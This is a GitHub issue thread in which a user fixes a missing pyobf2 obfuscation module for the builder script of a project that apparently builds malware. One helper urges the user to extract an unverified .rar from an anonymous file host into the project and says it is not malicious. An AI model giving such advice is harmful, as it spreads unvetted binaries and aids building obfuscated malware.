### ISSUE TITLE
[BUG] Pyobf2.lib

### ISSUE THREAD

**Issue by iAmScienceMan** [addi00000/empyrean#182]
**Describe the bug**
I have git and python installed, I tried installing pyobf2 through [this](https://github.com/0x3C50/pyobf2) website, but it still does not work.

**To Reproduce**
Happens everytime I try to run

**Expected behavior**
I expected this thing to run 

**Screenshots**
![image](https://user-images.githubusercontent.com/63004048/221382019-6d4ff211-7d41-4409-a34c-a7b40bbfb48c.png)

**Additional context**
> Traceback (most recent call last):
>   File "C:\Users\ahack\OneDrive\Desktop\Workspace\empyrean\builder.py", line 10, in <module>
>     import pyobf2.lib as obf
> ModuleNotFoundError: No module named 'pyobf2'
> Press any key to continue . . .

**Comment by Wizz1337** [comment]
Hi, when you try to install the `pyobf2` package did you get any error ?
If yes, if error looks something like this :
![image](https://user-images.githubusercontent.com/70026238/221404290-89bc4f1d-e48b-469a-8e68-4cb46827b52a.png)

in this case you need python version 3.10 or +

**Comment by iAmScienceMan** [comment]
> Hi, when you try to install the `pyobf2` package did you get any error ? If yes, if error looks something like this : ![image](https://user-images.githubusercontent.com/70026238/221404290-89bc4f1d-e48b-469a-8e68-4cb46827b52a.png)
> 
> in this case you need python version 3.10 or +

I have the latest Python version 3.11.2
I even tried reinstalling Python… When installing `pyobf2`, I get this response:
![image](https://user-images.githubusercontent.com/63004048/221626095-19359f62-b074-41ad-a341-32f0263c51a4.png)

**Comment by Wizz1337** [comment]
Can you try to do these commands?
`python3 -m pip install --upgrade pip`
`pip install git+https://github.com/0x3C50/pyobf2.git`

If that doesn't work, I'll ask you to download the .rar file below (you can check it does not contain any malicious script) and extract it to the project directory and it should work.
![image](https://user-images.githubusercontent.com/70026238/221756456-e9e080ed-cca5-4680-b049-1833ca40ad27.png)

.rar file : 
download link : https://anonfiles.com/K7meR3a1z1/pyobf2_rar
direct download : https://cdn-152.anonfiles.com/K7meR3a1z1/a5f96aac-1677560269/pyobf2.rar

**Comment by iAmScienceMan** [comment]
Sorry for not responding, but I will do this as I come home
